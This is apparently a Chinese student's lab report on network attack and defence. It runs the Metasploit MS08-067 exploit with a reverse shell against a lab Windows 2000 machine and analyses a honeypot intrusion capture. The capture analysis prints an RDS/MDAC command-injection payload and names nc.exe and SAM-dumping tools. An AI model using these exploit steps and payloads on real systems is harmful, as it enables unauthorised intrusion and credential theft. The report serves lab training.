20241905 2024-2025-2 《网络攻防实践》 第6次作业

1. 实验内容

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2. 实验过程

2.1 实践Metasploit

实验用到的两台虚拟机的IP地址如下:

虚拟机名称 IP地址
KALI 172.20.10.4
Windows2k 172.20.10.7

1、测试攻击机和靶机之间的连通性

image-20250403090729639

image-20250403090816573

2、在KALI输入命令msfconsole进入Metasploit

image-20250403091053252

3、输入命令search ms08-067来查看MS08-067漏洞

image-20250403091433015

4、输入命令show options可以查看可选择的操作

image-20250403091545861

5、输入命令show payloads可以显示可用的攻击载荷

image-20250403091931735

6、输入命令use exploit/windows/smb/ms08_067_netapi来使用针对ms08-067漏洞的攻击脚本,并输入命令set payload generic/shell_reverse_tcp来选择要使用的攻击载荷

image-20250403092718140

7、输入命令set RHOST 172.20.10.7通过IP来指定靶机,输入命令set LHOET 172.20.10.4再来指定本机

image-20250403092744362

8、输入命令show options可以查看到是否配置成功,此时表示已经配置成功了

image-20250403092815398

9、输入命令exploit来进行攻击

image-20250403093142603

10、此时已经攻击成功,远程可以操纵windows靶机,可以输入命令ipconfig来查看靶机的IP地址

image-20250403093240837

2.2 取证分析实践

1、攻击者使用了什么破解工具进行攻击

通过wireshark打开文件snort-0204@0117.log,输入命令ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤,过滤后可以看到存在TCP和HTTP协议数据包

image-20250403094450036

在117HTTP数据包中可以看到在Unicode编码中对应符号/的字符%C0%AF,分析推测这是攻击者在利用Unicode攻击访问boot.ini文件

image-20250403094913444

在140数据包中可以看到攻击者在尝试获得msadcs.dll文件

image-20250403095353075

追踪到149数据包可以看到攻击者输入了sql语句

select from customers where city='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access driver (*.mdb)};dbp=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
# select为sql命令;然后输入shell指令
# "cmd /c echo werd >> c:\fun"是在取得系统的访问权限
# driver={Microsoft Access driver (*.mdb)}是在使用Microsoft Access driver (*.mdb)的驱动
# dbp=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb是在使用这个dbp文件

再查询后面的特殊字符串ADM!ROX!YOUR!WORLD!,发现攻击者是利用了msadc2.pl渗透代码发起的攻击

image-20250403095737991

2、攻击者如何使用这个破解工具进入并控制了系统

通过命令ip.addr == 213.116.251.162 && http过滤http数据包,观察可以发现,从每一次攻击的时间都很短,推测攻击者先将指令写入shell脚本,再将这个脚本与msadc.pl攻击脚本一起执行

image-20250403103603984

通过命令ip.addr == 213.116.251.162 && ftp过滤ftp数据包,追踪可以看到攻击者在通过ftp传输文件,分别是nc.exe,pdump.exe,samdump.dll,根据视频学习到这里是在进行口令破解和提权,pdump.exesamdump.dll是配合使用破解口令的。nc.exe则是一个远程入侵的后门程序,便于下次攻击。

image-20250403104610578

3、攻击者获得系统访问权限后做了什么

继续查看http包,发现攻击者在连接6969端口,因此利用命令tcp.port == 6969来过滤

image-20250403105546365

追踪TCP流可以看到攻击者输入的相关命令,结合视频中的shell命令分析,可以得知攻击者进入靶机之后查看了系统文件,创建会话写入文件yay.txt,然后又尝试删除SAM文件和拷贝har.txt文件

image-20250403110153895

image-20250403110251511

4、我们如何防止这样的攻击

  1. 设置强口令,增加破解难度
  2. 定期打补丁,修复漏洞
  3. 定期扫描主机,查看是否存在漏洞

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

通过命令tcp.stream eq 174追踪174号TCP流,发现攻击者发送了图中的命令,可见,攻击者已经警觉了他的目标是一台蜜罐主机

image-20250403110728669

2.3 团队对抗实践

攻击机和靶机两台虚拟机的IP地址如下:

攻防信息 IP地址
攻击方KALI(孔佳音) 172.20.10.4
防守方Windows2k(恩克) 172.20.10.5

使用MS08-067漏洞,通过下面的命令进行攻击

msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 172.20.10.5
set LHOET 172.20.10.4
exploit
mkdir KJY
cd KJY
echo i'm watching you >>haha.txt

image-20250403114022114

攻击者输入上述命令后,防守者的windows虚拟机上出现了攻击者创建的文件夹

image-20250403113510303

以及攻击者写入的txt文件,打开可以看到攻击者输入的语句

image-20250403113515098

image-20250403113519321

在攻击过程中同时打开wireshark收集数据包,防守方可以查看数据包,追踪TCP流可以看到攻击者进行的操作

image-20250403113722498

3. 学习中遇到的问题及解决

4. 学习感想和体会

之前两次实验分别学习了攻击和防御的手段,这一次则是实际模拟了攻击者利用漏洞进行攻击,并且成功针对此漏洞远程操纵了靶机。取证分析实验中,通过分析snort嗅探的数据包,一步步分析攻击者的操作,并最终发现攻击者察觉出了自己攻击的是个蜜罐,防御者则通过建立蜜罐的方式抵御了攻击,这个过程层层拨茧,在结合学习通中对于shell代码的分析学习中也让我对本次实验的攻击脚本有了更深的了解。

参考资料

《网络攻防技术与实践》课本和学习通视频

posted @ 2025-04-06 21:28  放放q  阅读(70)  评论(0)    收藏  举报